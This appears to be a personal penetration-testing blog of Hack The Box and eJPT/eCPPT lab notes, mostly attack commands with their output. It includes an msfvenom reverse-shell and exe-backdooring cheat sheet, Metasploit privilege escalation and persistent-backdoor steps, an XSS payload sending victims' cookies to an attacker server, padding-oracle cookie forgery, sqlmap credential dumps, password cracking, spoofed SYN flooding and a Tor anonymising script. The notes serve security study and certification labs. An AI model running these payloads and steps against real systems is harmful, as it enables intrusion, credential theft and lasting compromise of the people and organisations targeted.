Monster (www.monster.com)
CareerBuilder (www.careerbuilder.com)
Glassdoor (www.glassdoor.com)
Simplyhired (www.simplyhired.com)
Dice (www.dice.com)

Finance Section:
CrunchBase (www.crunchbase.com)
Inc. (www.inc.com)
Google Finance (finance.google.com)
EDGAR (www.sec.gov/edgar.shtml)
Yahoo Finance (finance.yahoo.com)

File-related:
Download document files from the respondent before using FOCA to analyze them.

Harvester:
#theHarvester -d microsoft.com -s -v -e 8.8.4.4 -n -c -b all

Archive:
WayBackMachine (archive.org)

Sunday, June 14, 2020

[eCPPT]Change Windows password through Kali Live CD

1) Import SAM by the chntpw command:
#chntpw -i /media/XXXX/WINDOWS/system32/config/SAM

2) Use the popup interactive user interface to change the password.

Thursday, May 28, 2020

[HTB]Tools for CTF

Port Scan:
#nmap -sS -A -p- -T4 IP
#nmap -sS --script vuln -p Ports IP

Vulnerability Scan:
OpenVAS

Web Scan:
dirb
Dirbuster
Yyj-websprider
Paros
Burp Suite
Sqlmap

Exploitation:
msfconsole
meterpreter
exploitdb / searchsploit

Backdoor:
msfvenom
msfconsole handler

[HTB][meterpreter][msfconsole][metasploit]Migrate the process in Meterpreter

meterpreter > ps
 ...
 2660  1456  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 2732  604   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe

meterpreter > migrate 2732
[*] Migrating from 1980 to 2732...
[*] Migration completed successfully.

Sunday, May 24, 2020

[HTB]An example of Padding Oracle Attack

1) Obtain the suspicious cookie. In this case, the cookie is:
auth=ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy

2) Run the following command:
# padbuster http://10.10.XX.XX ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy 8 -cookies auth=ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy -encoding 0
-------------------------------------------------------
** Finished ***
[+] Decrypted value (ASCII): user=aaa
[+] Decrypted value (HEX): 757365723D6161610808080808080808
[+] Decrypted value (Base64): dXNlcj1hYWEICAgICAgICA==
-------------------------------------------------------

3) Generate a new cookie by running the following command:
# padbuster http://10.10.10.18 ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy 8 -cookies auth=ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy -encoding 0 -plaintext user=admin
-------------------------------------------------------
** Finished ***
[+] Encrypted value is: BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
-------------------------------------------------------

4) Use the new cookie to refresh the page. In this case, the new cookie is:
auth=BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA

Saturday, May 23, 2020

[HTB][msfvenom][metasploit]Msfvenom Cheat Sheet

#Copied from https://nitesculucian.github.io/2018/07/24/msfvenom-cheat-sheet/


MsfVenom is a Metasploit standalone payload generator as a replacement for msfpayload and msfencode.


Binaries
Command Info
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe Creates a simple TCP Payload for Windows
msfvenom -p windows/meterpreter/reverse_http LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe Creates a simple HTTP Payload for Windows
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f elf > example.elf Creates a simple TCP Shell for Linux
msfvenom -p osx/x86/shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f macho > example.macho Creates a simple TCP Shell for Mac
msfvenom -p android/meterpreter/reverse/tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} R > example.apk Creats a simple TCP Payload for Android


Web Payloads
Command Info
msfvenom -p php/meterpreter_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.php Creats a Simple TCP Shell for PHP
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f asp > example.asp Creats a Simple TCP Shell for ASP
msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.jsp Creats a Simple TCP Shell for Javascript
msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f war > example.war Creats a Simple TCP Shell for WAR


PHP Payload:
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.XX.XX LPORT=4444 -a php -f raw > /home/demonalex/Downloads/example.php


Windows Payloads
Command Info
msfvenom -l encoders Lists all avalaible encoders
msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe Binds an exe with a Payload (Backdoors an exe)
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -b ‘\x00’ -i 3 -f exe > example.exe Creates a simple TCP payload with shikata_ga_nai encoder
msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -i 3 -b “\x00” -f exe > example.exe Binds an exe with a Payload and encodes it


How do I get the meterprater shell?
nli@nlistation:~$ sudo msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.123
lhost => 192.168.1.123
msf exploit(multi/handler) > set lport 4444
lport => 4444
msf exploit(multi/handler) > run

Thursday, May 21, 2020

[HTB][meterpreter][msfconsole]Find Privilege Escalation exploits through Metasploit

meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.

meterpreter > background

msf > search local_exploit

msf > use 0

msf > set session 1

msf > run
[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 30 exploit checks are being tried...
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

Wednesday, May 20, 2020

[HTB][meterpreter][msfconsole]A walkthrough of Privilege Escalation in Windows

meterpreter > getuid
Neither Administrator nor SYSTEM

meterpreter > cd %TEMP%

meterpreter > background

msf > use exploit/windows/local/ms10_015_kitrap0d

msf > set session 2

msf > set lhost 10.10.XX.XX

msf > run

msf > sessions -i 2

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Tuesday, May 19, 2020

[HTB] Some usage of smbclient

# smbclient -N -L \\\\10.10.10.XXX\\
# smbclient \\\\10.10.10.XXX\\Users "welcome20XX" -U "TempUser"
smb: \> get abcdef~1.txt
smb: \> get "New Text Document.txt"

Thursday, May 14, 2020

[HTB]Knock down MS SQL Server through xp_cmdshell

Assume that at the beginning an user/password pair has been obtained:
# mssqlclient.py account@10.10.10.xx -windows-auth
SQL> select IS_SRVROLEMEMBER ('sysadmin');
SQL> EXEC sp_configure 'Show Advanced Options', 1;
SQL> reconfigure;
SQL> sp_configure;
SQL> EXEC sp_configure 'xp_cmdshell', 1
SQL> reconfigure;
SQL> xp_cmdshell "whoami"

[HTB]Listing and accessing remote shares through smbclient

Show remote shares:
# smbclient -N -L \\\\192.168.0.100

After all shares are listed, pick up one and access it:
# smbclient -N \\\\192.168.0.100\\share1

Show content in the share:
smb: \> dir

Download a file from the share:
smb: \> get aaa.txt

[HTB]Auto Scan through NMAP

#!/bin/bash
echo TARGET IP:
read ip
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -sC -sV -p$ports $ip

Wednesday, May 13, 2020

[HTB]POST HTTP data through Command Line

Example:
# curl -d "param1=value1&param2=value2" -H "Content-Type: application/x-www-form-urlencoded" -X POST http://localhost:3000/data

POST verb without any data:
#  curl -XPOST https://www.xxxxxxxxx.xx/api/invite/generate

Thursday, May 7, 2020

[eJPT][nmap]Apply Nmap to Synflood

Command:
#watch -n 10 "nmap -e wlan0 -Pn -T5 -S 192.168.0.253 192.168.0.251"

-e wlan0: Specify the network adapter sending the packets.
-Pn: There is no need to PING before launching the scan.
-T5: The fastest rate.
-S 192.168.0.253: Spoofing the packet source as 192.168.0.253.
192.168.0.251: The target.
The nmap scan would be repeatedly launched every 10 seconds by using the watch command.

Monday, May 4, 2020

[eJPT][spider]A script for crawling websites as Web Grep

#!/usr/bin/perl -w
#This script is named by YYJ, who is my friend and a smart lady.
#It is used for CTF and written by demonalex.
use Cwd;
$|=1;
$original_dir = getcwd;


for (0..7) { $folder .= chr( int(rand(25) + 65) ); }
#print "$folder\n";
system("mkdir -p /tmp/$folder");
chdir "/tmp/$folder";


print("Target URL (e.g. http://192.168.0.1:8080/ or http://www.163.com/): ");
$target_url=<STDIN>;
chop($target_url);
if(defined($target_url)){
;
}else{
die("Target URL is not defined!\n");
}
print("Maximum Recursion Depth (Default: 5): ");
$mrd=<STDIN>;
chop($mrd);
if($mrd ne ""){
;
}else{
$mrd=5;
}
print("Keyword (Default: password): ");
$keyword=<STDIN>;
chop($keyword);
if($keyword ne ""){
;
}else{
$keyword="password";
}

=head
print("\$target_url : $target_url\n");
print("\$mrd: $mrd\n");
print("\$keyword: $keyword\n");
=cut
system("wget -q -r -l $mrd $target_url");
print("----------------------------------------\n");
system("grep -nR -i $keyword");


chdir $original_dir;
system("rm -Rf /tmp/$folder");
exit(0);

Sunday, May 3, 2020

[eJPT]Crack MS SQL Server

The main idea is shown below:
- First, obtain a username/password pair of the target, a MS SQL Server;
- Second, utilize Hydra to verify the username/password pair;
- Third, launch Metasploit-Framework to exploit the MS SQL Server through the following sequence:
* auxiliary/scanner/mssql/mssql_login
* auxiliary/admin/mssql/mssql_enum
* exploit/windows/mssql/mssql_payload


1) Obtain an username/password pair and would like to verify the effectiveness the pair by applying Hydra:
#hydra -l admin -p test123 mssql://172.16.33.33

2) Verify the username/password pair by Metasploit Framework:
#msfconsole
msf5 > use auxiliary/scanner/mssql/mssql_login
msf5 auxiliary(scanner/mssql/mssql_login) > set rhosts xxx.xxx.xxx.xxx
msf5 auxiliary(scanner/mssql/mssql_login) > set username xxx
msf5 auxiliary(scanner/mssql/mssql_login) > set password xxx
msf5 auxiliary(scanner/mssql/mssql_login) > run

3) Enumerate the other users:
msf5 auxiliary(scanner/mssql/mssql_login) > use auxiliary/admin/mssql/mssql_enum
msf5 auxiliary(admin/mssql/mssql_enum) > set rhosts xxx.xxx.xxx.xxx
msf5 auxiliary(admin/mssql/mssql_enum) > set username xxx
msf5 auxiliary(admin/mssql/mssql_enum) > set password xxx
msf5 auxiliary(admin/mssql/mssql_enum) > run

4) Install a Meterpreter backdoor:
msf5 auxiliary(admin/mssql/mssql_enum) > use exploit/windows/mssql/mssql_payload
msf5 exploit(windows/mssql/mssql_payload) > set rhosts xxx.xxx.xxx.xxx
msf5 exploit(windows/mssql/mssql_payload) > set username xxx
msf5 exploit(windows/mssql/mssql_payload) > set password xxx
msf5 exploit(windows/mssql/mssql_payload) > set SRVPORT 53
msf5 exploit(windows/mssql/mssql_payload) > set payload windows/x64/shell_reverse_tcp
msf5 exploit(windows/mssql/mssql_payload) > set lhost xxx.xxx.xxx.xxx
msf5 exploit(windows/mssql/mssql_payload) > set lport 5555
#nc -k -l -p 5555
msf5 exploit(windows/mssql/mssql_payload) > exploit

5) Happy hunting!

[eJPT]Find files in Windows

Find files through their filename:
c:\>dir *password*.txt /s /b /p

Find files through their content:
c:\>findstr /s /m /i administrator c:\users

Thursday, April 30, 2020

[eJPT][metasploit][msfvenom][meterpreter]msfvenom -- the backdoor function of Metasploit

#Reference: https://nitesculucian.github.io/2018/07/24/msfvenom-cheat-sheet/


*****Generate the server side:*****
# msfvenom -l encoders
...
x86/shikata_ga_nai
...

# msfvenom -l payloads
...
linux/x86/meterpreter_reverse_tcp
...

# msfvenom -l formats
...
elf
elf-so
exe
...

# msfvenom -p linux/x86/meterpreter_reverse_tcp lhost=xxx.xxx.xxx.xxx lport=xxxxx -e x86/shikata_ga_nai -i 5 -f elf -o ./test.out


*****The client side:*****
# /etc/init.d/postgresql start

# msfconsole
msf5> use exploit/multi/handler

msf5> search type:payload platform:linux

msf5> set payload payload/linux/x64/meterpreter_reverse_tcp

msf5> set LHOST xxx.xxx.xxx.xxx

msf5> exploit -j

msf5> sessions -l

[certificate]ISO 22301 LA


Saturday, April 25, 2020

[eJPT]Add a route in Kali

root@demonalex:~# ip route add 172.16.88.0/24 via 10.175.34.1

root@demonalex:~# netstat -rn
Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
...
172.16.88.0     10.175.34.1     255.255.255.0   UG        0 0          0 tap0
...

root@demonalex:~# nmap -sn -n 172.16.88.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-25 11:57 EDT
Nmap scan report for 172.16.88.1
Host is up (0.059s latency).
Nmap scan report for 172.16.88.81
Host is up (0.062s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 5.87 seconds

Friday, April 24, 2020

[eJPT][metasploit][msfconsole]Metasploit Msfconsole Gameplay

#################################################Basic Gameplay
#/etc/init.d/postgresql start
#msfconsole
>search type:exploit platform:windows               <--Find the appropriate exploit
>use XX
>show options
...
>set XXX XXX
...
>show payloads
>set payload windows/meterpreter/reverse_tcp        <--Select a payload
>set LHOST XXX.XXX.XXX.XXX
>set EXITFUNC process
>run                                                <--Exploit
...
meterpreter>getuid
meterpreter>getsystem                               <--Privilege Escalation
meterpreter>getuid
meterpreter>background
>sessions -l
...



#################################################Install Persistent Backdoor
>use exploit/windows/local/persistence
>show options
...
>set reg_name XXX
>set exe_name XXX
>set startup SYSTEM
>set session 1
>set payload windows/meterpreter/reverse_tcp
>set exitfunc process
>set lhost XXX.XXX.XXX.XXX
>set lport XXXX
>set DisablePayloadHandler false
>exploit                                           <--Install a backdoor. Use exploit -j instead if not working.
...
>use exploit/multi/handler
>set lhost XXX.XXX.XXX.XXX
>set lport XXXX
>set payload windows/meterpreter/reverse_tcp
>exploit -j                                       <--Launch the backdoor client, namely Handler



#################################################Crack Passwords
>sessions -l
>sessions -i 1
meterpreter>hashdump                              <--Dump the hashes of all accounts as the output. Save the output as a file and use John to crack it.



#################################################Search and Download Files
meterpreter>search -f congrats.txt
meterpreter>download 'c:\Documents and Settings\eLSAdmin\My Documents\Congrats.txt' /root/

[eJPT][enum4linux][smbclient]Null Session

1) Use "enum4linux -n" to make sure if "<20>" exists:
#enum4linux -n 192.168.1.10

2) If "<20>" exists, it means Null Session could be exploited. Utilize the following command to get more details:
#enum4linux 192.168.1.10

3) If confirmed that Null Session exists, you can remotely list all share of the target:
#smbclient -L WORKGROUP -I 192.168.1.10 -N -U ""

4) You also can connect the remote server by applying the following command:
#smbclient \\\\192.168.1.10\\c$ -N -U ""

5) Download those files stored on the share drive:
smb: \> get Congratulations.txt

Thursday, April 23, 2020

[eJPT][sqlmap]SQLMap Usage

1) First, find out the breach point, such as http://10.124.211.96/newsdetails.php?id=26.


2) Second, determine the databases:
# sqlmap -u http://10.124.211.96/newsdetails.php?id=26 --dbs
----------------------------------------------------------------------------
[13:29:06] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 4.1
[13:29:07] [INFO] fetching database names
available databases [2]:
[*] awd
[*] information_schema
----------------------------------------------------------------------------


3) Third, determine tables:
# sqlmap -u http://10.124.211.96/newsdetails.php?id=26 -D awd --tables
----------------------------------------------------------------------------
[13:30:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 4.1
[13:30:37] [INFO] fetching tables for database: 'awd'
Database: awd
[3 tables]
+----------+
| accounts |
| awards   |
| news     |
+----------+
----------------------------------------------------------------------------


4) Forth, dump a table's data:
# sqlmap -u http://10.124.211.96/newsdetails.php?id=26 -D awd -T accounts --dump
----------------------------------------------------------------------------
Database: awd                                                                                                                                   
Table: accounts
[11 entries]
+------+-----------------------------------------------------+-------------+-------------------+
| id   | email                                               | password    | displayname       |
+------+-----------------------------------------------------+-------------+-------------------+
| 1    | admin@awdmgmt.labs                                  | S3cr3tBOFH  | Admin             |
| 2    | porta.elit.a@adipiscingMaurismolestie.net           | VUH74DYX6DO | Mallory Reed      |
...
----------------------------------------------------------------------------


5) Fifth, if the vulnerable link requires an extra authentication, attach the cookie with the scanning command:
# sqlmap -u http://10.124.211.96/newsdetails.php?id=26 -D awd -T accounts -p id --cookie="session_level7a=eyJ1c2VyIjoiYWRtaW4ifQ.YSLwbA.3Bixl9Opr1vJ6WU4YLZZUohhDPw" --dump
...

Wednesday, April 22, 2020

[eJPT][eCPPT]Hijack Cookie through XSS

There are four components as follows:
- Attacker Client PC
- Attacker Logging Server
- Vulnerable Server
- Victim Client PC


1) Attacker: first finds a Vulnerable Server and its breach point.

2) Attacker: enter the following snippet in order to hijack the cookie kepts by Victim Client PC (P.S.: the IP address, 192.168.99.102, belongs to Attacker Logging Server in this example):
<script>var i = new Image();i.src="http://192.168.99.102/log.php?q="+document.cookie;</script>

3) Attacker: log into Attacker Logging Server (P.S.: it is 192.168.99.102 in this example), and execute the following command:
#nc -vv -k -l -p 80 >> /root/xss.log

4) Attacker: when Victim Client PC browses the Vulnerable Server, check the output of the command above.

5) Attacker: after obtaining the victim's cookie, utilize some browser Add-ons to change to the victim's cookie in an effort to hijack the victim's privilege. Among others, the Add-on called EditThisCookie is for Chromium, and another Add-on named Cookie Quick Manager is for FireFox.

Tuesday, April 21, 2020

[eJPT][Nessus]Installing Nessus v8.10 on 20200421

1) Download the deb file of Nessus from "https://www.tenable.com/downloads/nessus?loginAttempted=true", and store the deb file at /usr/local/sbin.

2) Install it as below shows:
#cd /usr/local/sbin
#dpkg -i ./Nessus-8.10.0-debian6_i386.deb

3) Start Nessus:
#/etc/init.d/nessusd start

4) Open a browser and access "https://127.0.0.1:8834".

5) After the webportal shows up, select "Nessus Essentials" before filling out a form in order to get the Activation Code. You then fill up the Activation Code offered by an email sent by Tenable before creating an Admin account. The installation is done.

[eJPT]Network Scan with Fping and Nmap

#fping -a -g 192.168.1.0/24 2>/dev/null
#nmap -sn 192.168.1.0/24

Sunday, April 19, 2020

[eJPT][nmap]Windows Share Enumeration

Enumeration under Linux:
#nmblookup -a IP_ADDRESS
#smbclient -L //IP_ADDRESS -N

Enumeration under Windows:
>nbtstat -A IP_ADDRESS
>net view IP_ADDRESS

Enumeration with Nmap:
#ll /usr/share/nmap/scripts/|grep smb-enum-
-rw-r--r-- 1 root root  4846 Jan  9  2019 smb-enum-domains.nse
-rw-r--r-- 1 root root  5931 Jan  9  2019 smb-enum-groups.nse
-rw-r--r-- 1 root root  8045 Jan  9  2019 smb-enum-processes.nse
-rw-r--r-- 1 root root 27262 Jan  9  2019 smb-enum-services.nse
-rw-r--r-- 1 root root 12057 Jan  9  2019 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6923 Jan  9  2019 smb-enum-shares.nse
-rw-r--r-- 1 root root 12531 Jan  9  2019 smb-enum-users.nse
#nmap --script=smb-enum-users 192.168.1.10

Enumeration with Enum4Linux:
#enum4linux 192.168.1.10

Thursday, April 16, 2020

[eJPT]Hydra Basic Usage

Crack Username and Password at the same time:
#hydra -L USERNAME_LIST.txt -P PASSWORD_LIST.txt PROTOCOL://IP
example:
#hydra -L /usr/share/wordlists/accounts.txt -P /usr/share/wordlists/rockyou.txt ssh://192.168.0.1

Only crack Password:
#hydra -l USERNAME -P PASSWORD_LIST.txt PROTOCOL://IP
example:
#hydra -l root -P /usr/share/wordlists/rockyou.txt telnet://192.168.0.2

Try a username-password pair:
#hydra -l USERNAME -p PASSWORD PROTOCOL://IP
example:
#hydra -l administrator -p test123!@# rdp://192.168.0.3

[eJPT]Password Dictionary

https://wiki.skullsecurity.org/Passwords

Monday, April 13, 2020

[eJPT]A security knowledge base called Seclists

#apt-get update
#apt-get install seclists
#cd /usr/share/seclists
#ll

[eJPT]Keepass2 -- A secure password vault

Reference: https://keepass.info/

Install KeePass2 in Kali:
#apt-get update
#apt-get install keepass2

[eJPT]John the Ripper Cheat Sheet

Combine passwd file with shadow file:
# unshadow ./passwd ./shadow > ./crackme

Brute force the combination file:
# john -incremental --users=root ./crackme
OR without specifying any user:
# john -incremental ./crackme

Dictionary Crack:
# john --wordlist=/usr/share/wordlists/rockyou.txt ./crackme
OR with applying mangling rules:
# john --wordlist=/usr/share/wordlists/rockyou.txt  -rules ./crackme

Read what have been cracked:
# john --shown ./crackme

Crack others with John
1) Apply the following command to locate those commands being able to convert those encrypted into a hash:
# locate *2john
2) Export a hash from an encrypted file (e.g. RAR):
# rar2john ./encrypted.rar > ./encrypted.rar.hash
3) Crack it:
# john --wordlist=/usr/share/wordlists/rockyou.txt ./encrypted.rar.hash

Friday, April 10, 2020

[eJPT]Directory Brute Force

1) OWASP DirBuster
In Kali, execute the following command:
# dirbuster
Enter the target's information and pick up Brute Force lists at /usr/share/dirbuster/wordlists before performing the scan.

2) DirB
In Kali, run the command below:
# dirb https://www.google.com /usr/share/dirb/wordlists/vulns/apache.txt

[python][eJPT] Check HTTP Verbs

#!/usr/bin/python3
#https://github.com/d3m0n4l3x/python/blob/master/toys/check_http_options.py
import http.client
import re

def convertTuple(tup):
    str =  ': '.join(tup)
    return str

target=input("Your Target: ")
port=input("TCP Port (default: 80): ")

if port == "":
    port=80

port=int(port)

conn = http.client.HTTPConnection(target, port)
conn.request("OPTIONS", "/")
r1 = conn.getresponse()

response = r1.getheaders()

for each_item in response:
    each_item=convertTuple(each_item)
    result=re.match( r'^allow: ', each_item.lower())
    if result:
        print(each_item)
        exit(0)


print("There is no Allow field!")


Wednesday, April 8, 2020

[eJPT]Utilizing HTTPrint to perform Banner Grabbing

HTTPrint is a tool helping carry out an automatic Banner Grabbing.

Examples are shown below:

# httprint -P0 -s /usr/share/httprint/signatures.txt -h 1.2.3.4
# httprint -P0 -s /usr/share/httprint/signatures.txt -h https://1.2.3.4

[eJPT]Connect SSL service with Raw Socket

Normally, there would be two tools being utilized for connecting SSL service with Raw Socket, and they are OpenSSL and NCat.

Examples are shown below:

# openssl s_client -connect mail.google.com:443

# ncat --ssl -vv mail.google.com 443

The output coming from OpenSSL shows more details.

Monday, April 6, 2020

[HTB][eJPT][eCPPT]Nmap Cheat Sheet

1) Network / Host Scan (through ICMP)
Scan a nework:
#nmap -sn -n 192.168.1.0/24
Scan the same network segment without using ARP scan:
#nmap -sn -n --disable-arp-ping 192.168.1.0/24


1.5) Network / Host Scan through ARP
Scan a network through ARP by using the command, nping:
#nping --arp-type ARP 192.168.0.0/24


2) Port Scan (covering TCP & UDP)
TCP Port Scan:
#nmap -Pn -sT -p23,80 192.168.1.80
UDP Port Scan:
#nmap -Pn -sU -p1-10 192.168.1.80


3) Service Scan
Do OS/Service scan against a TCP port of an IP:
#nmap -O -sV -sT -p 80 192.168.1.80
Do OS/Service scan against an IP through UDP scan:
#nmap -O -sV -sU 192.168.1.80


4) Vulnerability Scan
Upgrade scripts:
#nmap --script-updatedb
Common Script Scan against an IP:
#nmap -sC 192.168.1.80
Vulnerability Scan:
#nmap --script vuln 10.10.10.40
Apply only those SAFE scripts to the vulnerability scan:
#nmap --script safe 10.10.10.40
Apply all scripts to scan a target:
#nmap --script all 10.10.10.40
Vulnerability Scan with SearchSploit's assistance:
#searchsploit -u ; nmap 192.168.1.1 -sV --open -oX ~/nmap.xml ; searchsploit -v --nmap ~/nmap.xml > ./exploits.txt


5) Combination Scan
Scan all ports and corresponding vulnerabilities of multiple IP addresses:
#nmap -sT -sV -O -p- -T4 -sC 192.168.1.100,101,102


6) Sneaky Scan
SYN Scan:
#nmap -sS -sV 192.168.0.80
Decoy Scan:
#nmap -Pn -sT -D 192.168.0.88,172.16.0.13,10.0.0.13,ME 192.168.1.80
IDLE Scan (The zombie, such as the TCP443 port of 192.168.0.251 in the following case, has to be existing):
#nmap -p22 -sI 192.168.0.251:443 192.168.0.253


7) Filtering Determination Scan
Determine the existence of Firewall/Filtering by utilizing "-sA" scan:
#nmap -sA -p- -T4 -n 192.168.0.0/24

[eJPT]Discovering a subdomain of a target

Below shows three means easily helping pinpoint subdomains:

1) Google Hacking
site:company.com

2) Use https://dnsdumpster.com/

3) Utilize sublist3r
sublist3r -d company.com

Monday, March 23, 2020

Install VirtualBox 6.1 in Kali 20190318

#echo 'deb [arch=amd64] https://download.virtualbox.org/virtualbox/debian buster contrib' >> /etc/apt/sources.list
#wget -q https://www.virtualbox.org/download/oracle_vbox_2016.asc -O- | sudo apt-key add -
#apt-get update
#apt-get install virtualbox-6.1

Sunday, March 15, 2020

Hacking training with labs - updated on 20200315

Offensive Security:
https://www.offensive-security.com/courses-and-certifications/

eLearnSecurity:
https://www.elearnsecurity.com/certification/

Pentester Academy:
https://www.pentesteracademy.com/topics

Pentester Lab:
https://pentesterlab.com/

Mile2:
https://mile2.com/

Tuesday, March 3, 2020

Disable IKE Aggressive Mode to disable Pre-Shared Key

Reference: https://www.cisco.com/en/US/docs/ios/security/command/reference/sec_c4.pdf

(conf) # crypto isakmp aggressive-mode disable

Check VPN IKE Pre-Shared Key vulnerability

Scan it:
#nmap -Pn -Av -sU -p 500 127.0.0.1

Obtain the pre-shared key:
#ike-scan -M 127.0.0.1 -A --id=:cisco -Pvpn1.psk

Crack it:
#psk-crack ./vpn1.psk
#psk-crack --bruteforce=10 --charset=0123456789abcdefghijklmnopqrstuvwxyz ./vpn1.psk

Sunday, March 1, 2020

Hacker101 Checklist

XSS
SQLi
Session Fixation
Clickjacking
File Inclusion
File Upload
Null Terminator

Saturday, February 29, 2020

The means to prevent ClickJacking

Reference: https://www.hacksplaining.com/prevention/click-jacking

1) X-Frame-Options (The most traditional means. Recommended is to set it as DENY.)
2) Content Security Policy (HTML5)
3) Frame-Killing

Wednesday, February 12, 2020

Sunday, February 9, 2020

Social Engineering Test Play Book

Preparation: What information needs to be imported into the whitelists of SPAM firewalls and Web Proxy?

What information needs to be import in Social Engineering Test platform?

How to launch a phishing campaign?

What to do when users report incident to IT department or IS department?

What to do when users are compromised?

How to generate reports in Social Engineering Test platform?

Thursday, February 6, 2020

[Threat Intelligence] Threat Hunting tools

(On Permise)
SpiderFoot

(GUI)
maltego

(Command)
theharvester

(Cloud)
RiskIQ PassiveTotal

Tuesday, February 4, 2020

Sunday, February 2, 2020

[Threat Intelligence] Install and use Spiderfoot through Docker

#/etc/init.d/docker start
#docker pull ctdc/spiderfoot
#docker run -idt -p 5001:5001 ctdc/spiderfoot

Browse http://127.0.0.1:5001 and enjoy Spiderfoot.

[Updated] The network hidden script through Tor, Privoxy, and ProxyChains

#!/usr/bin/perl -w
#A network hidden script through Tor and Privoxy. Written by demonalex.
$|=1;

if( -e '/etc/init.d/tor'){
 print "Tor: Installed!\n";
}else{
 die "Tor: Not installed! Please install Tor through \'apt-get update\; apt-get install tor\'!\n";
}

print "Starting Tor...\n";
system('/etc/init.d/tor start 2>/dev/null');

sleep(2);

print "Check Tor\'s status...";
$output=sprintf(`netstat -anteup|grep tor|grep \'127.0.0.1:9050\'|wc -l`);
chop($output);
if($output==1){
 print "ok!\n";
}else{
 die "failed!\n";
}

if ( -e '/etc/init.d/privoxy'){
 print "Privoxy: Installed!\n";
}else{
 die "Privoxy: Not installed! Please install Privoxy through \'apt-get update\; apt-get install privoxy\'!\n";
}

print "Checking Privoxy\'s configuration...\n";
$output=sprintf(`cat /etc/privoxy/config|grep forward-socks5|grep -v \'#\'|wc -l`);
chop($output);
if($output==0){
 die "forward-socks5 has not been tweaked yet!\n";
}
$output=sprintf(`cat /etc/privoxy/config|grep \'\\[::1\\]:8118\'|grep -v \'#\'|wc -l`);
chop($output);
if($output!=0){
 die "listen-address IPv6 has not been disabled yet!\n";
}
print "Complete!\n";

print "Starting Privoxy...\n";
system('/etc/init.d/privoxy start 2>/dev/null');

sleep(2);

print "Check Privoxy\'s status...";
$output=sprintf(`netstat -anteup|grep \'127.0.0.1:8118\'|wc -l`);
chop($output);
if($output==1){
 print "ok!\n";
}else{
 die "failed!\n";
}

print "Check ProxyChains's status...";
if(!( -e '/etc/proxychains.conf')){
 print "ProxyChains does not exist!\n";
}else{
 $output=`cat /etc/proxychains.conf |grep sock | grep -v \'\#\'|grep \'127.0.0.1\' | grep 9050|wc -l`;
 chop($output);
 if($output>=1){
  print "okay!\n";
  $proxychains=1;
 }else{
  print "Tor proxy has not been added yet!\n";
 }
}

print <<EndOutput;

HTTP/S Proxy: 127.0.0.1:8118
Socks5 Proxy: 127.0.0.1:9050
EndOutput

if($proxychains==1){
 print 'ProxyChains: #proxychains COMMAND'."\n";
 print "Such as: #proxychains curl ipv4.icanhazip.com"."\n\n";
}else{
 print "\n\n";
}

exit(0);

Tuesday, January 28, 2020

HTTP Security Scan through Kali

Copied from https://ired.team/offensive-security-experiments/offensive-security-cheetsheets

target=10.0.0.1; gobuster -u http://$target -r -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt -t 150 -l | tee $target-gobuster
